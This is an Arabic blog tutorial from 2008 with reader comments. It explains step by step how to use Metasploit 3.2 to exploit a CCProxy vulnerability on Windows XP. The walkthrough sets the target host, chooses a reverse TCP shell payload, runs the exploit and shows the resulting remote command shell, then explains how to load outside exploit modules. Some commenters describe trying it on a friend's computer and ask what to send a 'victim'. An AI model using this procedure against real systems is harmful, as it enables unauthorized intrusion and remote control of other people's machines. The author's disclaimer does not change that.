استخدام مشروع Metasploit و شرح استغلال ثغراته بالتفصيل

كتب بتاريخ: Aug 10th, 2008 | بواسطة: عبدالمهيمن

بدأ مشروع ثغرات Metasploit في عام 2003 تقريبا و منذ ذلك الوقت حتى يومنا هذا شهد المشروع تطوّرات عديدة و ملحوظة خصوصا بعد اطلاق الاصدار 3.0 في بداية سنة 2008, يحتوي مشروع Metasploit على عدد كبير من ثغرات الأنظمة و البرامج الجاهزة للاستغلال بالاضافة للعديد من الأدوات التي تساعدنا على اكتشاف ثغرات Buffer overflow و فحص الأنظمة و الشبكات أضف الى ذلك احتوائه على قاعدة بيانات Shellcode و Opcode تساعد مكتشفي الثغرات على برمجة و كتابة استغلالاتهم بكل سهولة. و في كل اصدار جديد يضاف الى المشروع ثغرات و أدوات جديدة تجعل من ميتاسبلويت واحدا من أقوى و أسهل مشاريع الثغرات الموجودة في وقتنا هذا…

لكل شيء محاسن و مساوء قوة مشروع ميتاسبلويت و سهولة استخدامه جعلت الكثيرين من الأطفال الذين يظنون أنفسهم Hackers يستخدمه لاختراق أجهزة الآخرين و التحكم بها بتنفيذ بضعة أوامر دون أي معرفة أو فهم بالثغرة, سببها, برمجتها أو حتى كيفية استغلالها و بصراحة ترددت كثيرا عند كتابة هذا الموضوع لأن الاختراق باستخدام مشروع ميتاسبلويت سهل جدا و احترافي لدرجة أننا قد نتمكن من اختراق جميع الأجهزة الموجودة معنا على الشبكة بسهولة و بتطبيق عدة أوامر فقط! و قبل أن أبدأ يجب معرفة أن الشرح للغرض العلمي فقط! و أنا لا أشجع أحد على تجربة ما ذكر هنا خارج نطاق شبكته الخاصة أو بدون اذن مسبق من مدير الشبكة و رغم محاولتي لتفصيل أغلب الخطوات المذكوره في الشرح الا أنه ليس موجه للمبتدئين أو للأشخاص الذين لا يملكون معرفة مسبقة بهذه الأمور و لن يتم التطرق لكيفية تنصيب المشروع على الجهاز فهذه الأشياء يجب أن تكون من البديهيات, سأستخدم سطر الأوامر بشكل أساسي و التطبيق سيكون على نظام Linux توزيعة BackTrack 3 على الاصدار 3.2 من مشروع ميتاسبلويت مع العلم من الممكن تطبيق بعض ما ذكر هنا على نظام ويندوز لكني لا أنصح بذلك!

نبدأ بفتح سطر الأوامر و من ثم الذهاب للمجلد الموجود به مشروع Metasploit في توزيعة BackTrack 3 سيكون المشروع في المسار التالي:

/pentest/exploits/framework3/

بعد ذلك نقوم بتشغيل سطر أوامر مشروع Metasploit بتنفيذ الأمر:

./msfconsole

أول ما يبدأ سطر أوامر Metasploit يعطينا معلومات عن حالة المشروع مثل الاصدار, عدد الثغرات الموجودة, عدد الأدوات و الـ Payloads و غيرها من الأمور الأخرى مايهمنها حاليا الثغرات فقط و هذا ما سأشرحه هنا. لنتمكن من استغلال ثغرة Metasploit هنالك بضعة خطوات يجب القيام بها, تختلف هذه الخطوات و الخيارات من ثغرة لأخرى الا أنها متشابهة بشكل عام. أول شيء علينا تحديد الثغرة التي نريد استغلالها بعد ذلك نحدد الخيارات الخاصة بها مثل الاصدار المصاب, نظام التشغيل, الاستغلال… ثم ننفذ الثغرة و نستخدمها حسب الاستغلال المحدد في الخيارات, يوجد الكثير من الأوامر التي يمكننا استخدامها في مشروع ميتاسبلويت لمعرفتها نقوم بتنفيذ الأمر التالي:

msf > help

ما يهمنا حاليا في استغلال الثغرات هي الأوامر المظللة في الصورة

msf > show exploits
msf > info exploit
msf > use exploit

نستخدم الأمر الأول لاظهار الثغرات الموجودة في المشروع أما الثاني لاظهار معلومات مفصلة عن الثغرة و مصادر خارجية عنها و الثالث لاستخدام الثغرة و تحديد خياراتها, أول شيء ننفذ الأمر الأول لاستعراض الثغرات الموجودة في المشروع

msf > show exploits

كما هو واضح تم اظهار عدد كبير من الثغرات و بجانب كل ثغرة معلومات بسيطة عن البرنامج/النظام و الاصدار المصاب و لاظهار معلومات مفصلة عن احدى الثغرات يكفي تنفيذ الأمر info , مثال على ذلك:

msf > info windows/proxy/ccproxy_telnet_ping

بعد تنفيذ الأمر السابق سيتم اظهار كافة المعلومات المتوفرة عن الثغرة الموجودة في برنامج CCProxy الاصدار 6.2 كما هو واضح في الصورة التالية:

قبل البدء باستخدام الثغرة نلاحظ الخيارات المتوفرة لها و كما قلت سابقا تختلف الخيارات من ثغرة لأخرى لكن في هذه الثغرة يوجد لدينا خيارين أساسيين الأول هو IP السيرفر الذي يستعمل برنامج CCProxy أما الثاني فهو المنفذ الذي يستخدمه البرنامج, أيضا لا ننسى تحديد النظام فهذا شيء مهم في ثغرات Metasploit خصوصا أنظمة Windows و اصداراتها و علينا معرفة أن استغلال هذه النوعية من الثغرات دقيق جدا و صعوبة استغلالها تكمن في دقتها فأي خيار خاطئ نحدده لن يمكننا من استغلال الثغرة بشكل صحيح, الأن ننفذ الأمر use لنستخدم الثغرة

msf > use windows/proxy/ccproxy_telnet_ping

و نستخدم الأمر show لاظهار خيارات الثغرة المتوفرة

msf  exploit(ccproxy_telnet_ping) > show options

نحدد الخيارات التي تناسبنا باستخدام الأمر set كما هو واضح من الصورة التالية:

أول شيء أظهرنا خيارات الثغرة باستخدام الأمر السابق ثم حددنا الخيار RHOST وهو IP الجهاز المستهدف و ذلك باستخدام الأمر:

msf  exploit(ccproxy_telnet_ping) > set RHOST 192.168.0.53

بالنسبة لي كان 192.168.0.53 و أبقيت الخيار RPORT نفسه 23 و هو المنفذ الذي يستخدمه برنامج CCProxy بشكل افتراضي و طبعا يمكن تغييره بحسب المنفذ المستخدم مثلا 34 باستخدام الأمر:

msf  exploit(ccproxy_telnet_ping) > set RPORT 34

بعد ذلك نقوم باظهار الأنظمة المتاحة باستخدام الأمر:

msf  exploit(ccproxy_telnet_ping) > show targets

نحدد الخيار 4 و هو نظام Windows XP SP2 – English بتنفيذ:

msf  exploit(ccproxy_telnet_ping) > set TARGET 4

أما الآن نظهر الاستغلالات المتاحة لهذه الثغرة باستخدام الأمر:

msf  exploit(ccproxy_telnet_ping) > show payloads

بالنسبة لي سأحدد الاستغلال windows/shell_reverse_tcp و يستخدم هذا الاستغلال لانشاء اتصال عكسي مع الجهاز الذي تم تنفيذ الثغرة عليه و نتحكم بالاتصالات من داخل مشروع ميتاسبلويت

msf  exploit(ccproxy_telnet_ping) > set PAYLOAD windows/shell_reverse_tcp

مع العلم من امكانية تحديد أي استغلال آخر نريد مثل تنفيذ أمر محدد على النظام, فتح منفذ و الاتصال به عن طريق أداة الـ Netcat, تحميل ملف و تشغيله أو حتى اضافة مستخدم جديد للنظام بصلاحيات Administrator, الأن ننفذ الأمر:

msf  exploit(ccproxy_telnet_ping) > show options

من جديد لمراجعة الخيارات المخصصة للثغرة أو لتعديل أي خيار مثل ما هو واضح بالصورة التالية:

يمكننا الأن تحديد خيارات الاستغلال مثل LHOST وهو IP جهازنا و LPORT هو المنفذ الذي سيتم الاتصال العكسي عن طريقه بتنفيذ الأمر:

msf  exploit(ccproxy_telnet_ping) > set LHOST 192.168.0.41

بالنسبة لي سأترك المنفذ 4444 نفسه دون تغيير, الأن لم يبقى علينا الا تطبيق الأمر

msf  exploit(ccproxy_telnet_ping) > exploit

لتنفيذ الثغرة و اذا كانت جميع الخيارات صحيحة سيتم تنفيذ الاستغلال و لنتمكن من مشاهدة الاتصالات العكسية الموجودة ننفذ الأمر:

msf > sessions -l

Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Command shell 192.168.0.41:23443 -> 192.168.0.53:1032

و من ثم ننفذ الأمر التالي للاتصال باحدى الاتصالات المتاحة و في هذه الحالة هو رقم 1

msf > sessions -i 1

[*] Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>

مع العلم من امكانية تنفيذ أكثر من استغلال على أكثر من جهاز و الحصول على اتصالات أخرى.. أو القيام بهذه العملية بشكل أوتوماتيكي باستخدام احدى أدوات ميتاسبلويت الخطيرة و هي db_autopwn التي سأترك شرحها لموضوع آخر و طبعا يوجد الكثير من الاستغلالت الأخرى أترك تجربتها لكم.

كل ما ذكر سابقا مجرد مثال بسيط عن احدى ثغرات الميتاسبلويت لكن المشروع أقوى من ذلك بكثير و يوجد له استخدمات و ثغرات أخرى قوية قد أشرحها قريبا ان شاء الله, كل ماعليك الأن هو التجربة و اعادة المحاولة و لا تتوقع أن تتمكن من استغلال الثغرة من أول مرة أو ثاني مرة و لا حتى بعد 10 مرات كل مرة تجرب بها ثغرة ستكشف شيء جديد و خطأ قمت به و تذكر أن الدقة أهم شيء في استغلال ثغرات مشروع الميتاسبلويت فتحديد البرنامج و الاصدار المصاب أصعب من استغلال الثغرة المكتوبة له. من الجميل أيضا في مشروع ميتاسبلويت هو وجود واجهات رسومية جميلة لتسهيل التعامل مع المشروع و مخصصة للأشخاص الذين لايحبون استخدام سطر الأوامر

الواجهة الرسومية العادية GUI لتشغيلها ننفذ الأمر التالي داخل مجلد مشروع Metasploit

./msfgui

الواجهة التي تعمل من المتصفح لتشغيلها ننفذ الأمر التالي داخل مجلد المشروع

./msfweb

بعد ذلك نفتح المتصفح على الرابط

http://127.0.0.1:55555

ماذا بعد؟ لنفرض الآن أننا نريد استغلال ثغرة غير موجودة في مشروع الميتاسبلويت أحضرناها من موقع Milw0rm مثلا كيف سنضيفها؟ بصراحة وجدت الكثيرين لا يعرفون الطريقة رغم بساطتها و طبعا الشرح للينوكس و نصيحة للجميع ابتعدوا عن ويندوز في هذه الأمور, كما نعرف في الاصدار 2 السابق من مشروع Metasploit كان المشروع و ثغراته تبرمج بلغة Perl و تأتي بالامتداد pm أما في الاصدار 3 تم اعادة برمجة المشروع من جديد بلغة Ruby و تأتي الثغرة بالامتداد rb لذلك أول شيء علينا معرفة نوعية الثغرة هل هي للاصدار 3.0 أم لاصدارات سابقة 2.0 ؟ أتوقع أن الاختلاف بين الكود البرمجي بين اللغتين واضح جدا (مثال عن ثغرة للاصدار 2 – مثال عن ثغرة للاصدار 3) طبعا الشرح هنا موجه للاصدار 3.0 فهذا مانتكلم عنه في هذا الموضوع, اذا اطلعنا على كود الثغرة و ركزنا على السطر التالي:

class Exploits::Windows:: Driver::Intel_Centrino_2200BG_driver_probe < Msf::Exploit::Remote

سنعرف أن الثغرة لنظام Windows مصنفة في Driver اسمها Intel_Centrino_2200BG_driver_probe الأن كل ماعلينا هو التوجه للمجلد الموجود في المسار التالي:

/home/USER/.msf3/

طبعا مع استبدال USER باسم المستخدم عندك في نظام لينوكس و اذا لم يكن المجلد موجود يمكننا انشاؤه ببساطة! أما اذا كنت تعمل بالمستخدم root كما في توزيعة BackTrack سيكون مسار المجلد:

/root/.msf3

بعد الدخول للمجلد ننشئ مجلد جديد باسم modules بداخله مجلد آخر باسم exploits ليصبح المسار النهائي بهذا الشكل:

/home/USER/.msf3/modules/exploits

الأن ننشئ بداخل مجلد exploits مجلد باسم windows بداخله مجلد driver بعد ذلك ندخل للمجلد driver و ننشئ ملف الثغرة باسم Intel_Centrino_2200BG_driver_probe متبوعا بالامتداد .rb و بداخله كود الثغرة كامل ليصبح مسار الثغرة النهائي:

/home/USER/.msf3/modules/exploits/windows/driver/Intel_Centrino_2200BG_driver_probe.rb

جميل جدا الأن كل ماعلينا هو تشغيل سطر أوامر مشروع Metasploit من جديد و ملاحظة عدد الثغرات قبل و بعد تطبيق ما سبق و سنلاحظ وجود الثغرة ضمن قائمة الثغرات الموجودة في المشروع!

أما اذا أردنا تحديث المشروع بشكل كامل و اضافة ثغرات و أدوات جديدة.. يكفي الدخول لمجلد المشروع و من ثم تطبيق الأمر التالي:

svn update

أخيرا يرجى في حال وجود أي خطأ في الشرح تنبيهي له مهما كان بسيط فالشرح طويل نوعا ما و رغم تجريب ماذكر و محاولتي لتجنب الوقع بأي خطأ فقد أسهو أحيانا, أتمنى أن يكون الموضوع قد نال اعجابكم و يرجى عدم نقل الموضوع دون الاشارة برابط للمصدر!

كتاب: Metasploit Toolkit for Penetration Testing Exploit Development and Vulnerability Research الكتاب يحتوي على شروحات متقدمة لاستخدامات مشروع الميتاسبلويت و برمجة ثغراته بالاضافة للعديد من الأمور الأخرى, اذا كنت مهتم بالحصول على نسخة من الكتاب يمكنك شراؤه من موقع أمازون من هذه الصفحة.

تحديث2: الاستخدامات المتقدمة لمشروع ميتاسبلويت

تحديث3: شروحات فيديو عن مشروع ميتاسبلويت

تحياتي, أخوكم Br4v3-H34r7.

التصنيف: Hacking & Security | عدد المشاهدات 48,740 | عدد التعليقات 124

أرسل الموضوع

التعليقات

91- Abu_Virus كتب بتاريخ: 05 Jun 2009 الساعة: 2:12 AM

بارك الله فيك

موضوع مفيد للمبتدئين
92- unforgiven كتب بتاريخ: 05 Jun 2009 الساعة: 3:37 PM

سلام اخي ممكن مساعدة فانا عند استعمالي لل ميتا لم استطع الاتصال بجهاز صديقي الذي على المسنجر حيث اتبعتك خطوة خطوة و عند عمل اكسبلوت
set LHOST *********
exploit
Exploit Failed: Connection timed out X.X.X.X:444
ممكن مساعدة ضروري
93- Br4v3-H34r7 كتب بتاريخ: 07 Jun 2009 الساعة: 12:18 AM

@unforgiven: جهاز صديقك على الماسنجر رسالة الخطأ واضحة أخي Connection timed out! ولا أعلم أي ثغرة استخدمت حتى تتصل به عن طريق المنفذ 444!
94- Hit-Man كتب بتاريخ: 16 Jun 2009 الساعة: 4:54 AM

تسبم حبيبي

و الله شرح فوق المستوى
و الله بدي اسئلك سؤال..
-ما هي النتيجة اللي تجي بعد استهداف الموقع تعني هل نسفه هل حصول على الاسم و الباس الادمن و لا شئ أخر ممكن تدكرلي ما هو ؟

و شكرا لك أخي
95- احمد كتب بتاريخ: 21 Jun 2009 الساعة: 10:51 PM

السلام عليكم
طيب حبيبي انا عملت الخطوات بس بعد هكذا المفروض الرابط يصير ايه عشان تعطيه للضحية ؟
يعني لو الاى بى اللى منفذ منه العملية هو 192.168.1.3 و الأى بى اللى حتخترقه 192.168.1.8 فاللى سيتم اختراق جهازه (صاحب 192.168.1.8 ) المفروض يفتح ايه بالضبط ؟؟ وبأى بورت ؟؟
وهل البورت 4444 لازم يكون مفتوح بالجهاز ؟

اخوى انتظرك على احر من الجمر ويارب ترد علطول وشكراً
96- احمد كتب بتاريخ: 22 Jun 2009 الساعة: 12:50 AM

ياترى اين ذهب التعليق الاخر لى؟؟
اخى الكريم كان سؤالى هو ماذا سيكون الرابط الذى تعطيه لضحيتك وهل يجب ان يكون البورت 4444مفتوح بجهاز المٌخترق
97- عبدالمهيمن كتب بتاريخ: 22 Jun 2009 الساعة: 4:58 PM

@احمد: اقرأ الموضوع مرة أخرى بتمعن وستعرف أن المنفذ 4444 سيتم فتحه بعد تنفيذ الاستغلال!! أي عندما يوجد ثغرة في النظام/البرنامج يتم ارسال الاستغلال وفتح المنفذ 4444 لتتمكن من الاتصال به.
98- MAD_WOLF كتب بتاريخ: 30 Jun 2009 الساعة: 9:38 PM

ناااايس والله انك صنديد يعني بطل
استمر..
<<<<<متااابع بصمت
99- AlooOha كتب بتاريخ: 02 Jul 2009 الساعة: 1:17 AM

السلام عليكم ,,
ياوحش الوحوش
والله انت بطران البطرانين تصدق الناس تتمنى اضافه اي مشهور يعني اللي يبي لاعب كوره واللي يبي ممثلـ او مغني , , يجلس معه خمس دقايقـ ,, انا صراحه ما اتمنى الا اني اضيفك واجيبك بطياره خاصه واجلس معك ربع ساعه < وش عنده الكاش
علشان ناخذ منك جميع ما تعرفه عن الميتاسبلويت ثم بعدها برى الباب ,, خخخخ اقصد نرجعك ..
هذي مقدمه عن مشاعري اتجاهك حاليا

مقدمتي انا ماعندي معلومات عن الاختراق الا 1% وهالواحد اعرف كيفه الاختراق وشلون بس اما برامج واستغلال لا والله ,, بس عندي الحمدلله عندي فكر كمبيوتري يعرف يطبق ويعرف يغير حسب حاجته < اقولها لاني اشوف بعض الدروج في منتدياتنا مايعرفون يطبقون الشروح < وكذا هم يرفعون معنوياتي واحس اني شوي مميز

بس بسئلك اسئله عده وارجو انك تتحملني عالسالفه الطويله

1- جربت بالباك تراك 4 على جهاز اخر في الشبكه معي بنظام ويندوز اكس بي وسكرت جدار الحمايه وعلما بان الجهاز محدث الى اخر تحديث في هذا اليوم يعني سيرفر باك3 واصل الويندوز الاكس بي كان ويندوز اكس بي سيرفر باك 2 < كاتب هالملاحظه لاني في فحصي بـ nmap
عطاني معلومات انه OS details: Microsoft Windows XP SP2 وانا عارف انه سيرفر باك 3
وبعض الاجهزه يعطيني انه ويندوز 2003 وانا اعرف ان محدث الى سيرفر باك 3
انا اقول هالكلام لان في شرحك target حددت الاكس بي سيرفر باك 2 وحددت وحاولت الثالثه 3
وايضا عندما اعرض targets يطلعي انواع الاكس بي عربي وفرنسي وانجليزي فوق 100 نوع
فخفت ان اصله انجليزي ومعرب جربت اغير يعني حاولت جميع الخيارات الممكنه
حبيت اذكر هذي علشان تقول هل فيه فوارق في اني احدد قيمه targets ولا لا
ثاني شي بعض الاستغلات تكون القميه targets ( اوتماتيك ) < واقد اغيرها طبعا
هل تنصح بتغيرها ولالا ؟

2- في فحص للمنافذ 135 و139 و 2869 كانت كلها اوبن والسبب اني معطل الجدار
طبعا 135 Microsoft Windows RPC ومعروف في كل الاجهزه
و139 ما حط لي اسم لاستغله وانا مثل ماقلت لك جاهل مع اني اعرفه انه منفذ لنت بيوس في كل الاجهزه
ومنفذ 2869 Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)

انا جربت استغل 135 الظاهر انه بـ windows/dcerpc/ms03_026_dcom
طبعا كلش سويته صح ولكن ما ارسل شي وعرفت ان هالاستغلال قديم وكذا حاط في مقدمتي انه جهاز محدث الخ وكذا على ما اعتقد اللي ابيك تتاكده لي انه خلاص ماتنفع على الجهاز ولو ان البورت 135 مفتوح وبدون جدار حمايه

وهل في هالاجزه السيرفر باك 3 من البورتات اللي فوق اقدر استغل :( ؟

3- في جهاز في الشبكه عندي لقيت عنده بورت 1110 +19780
ما رايك في البورتين هل تتدل على اختراق احد للجهاز وهل اقدر استغلها انا بالمتاسبوليت

——————–
اخيرا واقسم بان مدونتك شي خيالي من جميع النواحي ..المواضيع والمتابعه وحتى الوان المدونه طلقه بمعنى الكلمه وتصميمه بهذا بهذا الشكل يدل على الذوق اللي تملكه في اختيارك لها بهذا الشكل ,, وهذا الكلام موب تشيجع تستحقه بس .. الا طمع ايضا في ان تستمر بهذي الطريقه :
D
واقتراح بسيط انت واحد ولا اظنك تلحق كلش وخاصه بان مدونتك يزاداد زوارها والعالم يبونك تستمر في العطا الصدق ..
فلو تخلي احد يساعدك ممن تثق فيه يكتب الشروح للمبتدئين وانت في شروحك الجديده تربط برابط يرجع لشرح الخاص لمبتدئ قبل ان يشوف شرحك ..ولا تجيك مثل هالاسئله قبل ان تيدا علشان تصير المدونه 100% وكذا يحصل لك وقت اكثر واكثر وهو عباره عن اقتراح واسف اني حطيته بالرد
100- tnk كتب بتاريخ: 14 Jul 2009 الساعة: 4:00 PM

مشكور اخى على المعلومات القيمة والمجهود الاكثر من رائع و كلمة شكر لا تكفى …….. ونسئل لك لك ميزيدا من التالق بادن الله
صراحة موضوع منطم و جميل فى خطا مطبعى بسيط ان شاء الله فى الجملة دى “”" المشروع و ثغراته تبرمج بلغة Perl و تأتي بالامتداد pm “”"” الثغرات كانت بامتداد pl وليس PM
101- عبدالمهيمن كتب بتاريخ: 15 Jul 2009 الساعة: 2:19 AM

@AlooOha: عذرا.. يبدوا أن تعليقك سقط سهوا فالآن حتى انتبهت له! ربما لأنه طويل فأجلته لوقت آخر ثم نسيته << ارحمنا بحجم التعليق في المرة القادمة
بخصوص nmap فهي تعتمد على الـ Remote OS Fingerprint وتحاول معرفة النظام عن بعد, لكن النتيجة تكون تقريبية ولا تستطيع الجزم بأنها صحيحة! وطبعا يوجد فرق بين حزمة Service Pack وأخرى وبين لغات النظام لأن عندما تتغير الـ Service Pack أو لغة النظام تتغير بعض ملفات dll وهي الملفات المسؤولة عن التعامل مع الكيرنل في نظام ويندوز والتي يتم الاعتماد عليها في استغلال الثغرة وتشغيل الشيل كود في الذاكرة. عندما تجد خيار automatic متوفّر فالأفضل أن تبقى عليه لأنه الأضمن وسيقوم بتجربة الخيارات حتى تعمل الثغرة (الا اذا كان لك غايات أخرى) بخصوص المنافذ التي ذكرتها فهي منافذ خاصة بنظام ويندوز واذا كانت مفتوحة لا يعني أنك قادر على اختراق الجهاز (اذا كان محدث), بخصوص المدونة أنا الذي أكتب فيها فقط لأنها ببساطة "مدوّنة" يوجد مجتمع iSecur1ty أكتب به أنا ومجموعة من الأصدقاء.

@tnk: البرامج المبرمجة بلغة بيرل تأتي عادة بالامتداد pl لكن حسب معلوماتي وتعاملي مع المشروع الثغرات كانت تأتي بالامتداد pm ويمكنك مراجعة موقع ميلوورم للتأكد (بالمناسبة لا يوجد فارق ان كانت pm أو pl فالثغرة ستعمل على مفسّر بيرل مهما كان الامتداد!)
102- Mr Nawaf كتب بتاريخ: 30 Jul 2009 الساعة: 3:51 AM

مشروع الميتا مشـروع نـآجـح فعـلاً لمن يجيد أستخدامه

شكـراً لك يا عبد المهيمن على الشـرح ,,
103- B4CK7R4CK3R كتب بتاريخ: 01 Aug 2009 الساعة: 11:37 AM

السلام عليكم ورحمة الله وبركاته
ما شاء الله مدونتك اخي رائعة وجميلة انا نفذت الشرح على احد الاجهزة معي في الشبكة ولاكن تظهر لي رسالة لا اعلم ما هي انظر هذا ما يخرج لي عند تطبيق امر EXPLOIT
Started reverse handler
[-] Exploit failed: The connection timed out (10.0.0.2:445).
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >
ما معنى هذا اخي وشكرا لك على اية حال
104- t4h3r كتب بتاريخ: 06 Aug 2009 الساعة: 8:19 PM

بارك الله فيك

والله جامد جداً وواضح جداً انك تعبت
بص انا مبتدئ فى الباك تراك عموماً واتعلمت طريقة تثبيتها من المدونة وتابعت معاك الشرح للأخر بس طبعاً ما فيش حد اجرب عليه
هابقى اخلى حد من صحابى فى الشبكة يفتح برنامج من اللى موجودين فى الميتاسبلويت واجرب انفذ عليه .. وان شاء الله اقولك النتيجة

تسلم ايدك يا باشا

اه عايز اعرف حاجه
إزاى اقدر اتعلم حاجات كتير فى الميتاسبلويت .. مع العلم انى مبتدئ طبعاً ودى اول مره افتح المشروع ده
105- كوبرا الموت كتب بتاريخ: 10 Aug 2009 الساعة: 9:39 PM

مشكور على الشرح الوافي يا اخ وتحياتي وكل الاحترام لما قدمت مع افاده
والله لا يحرمنا من جديدك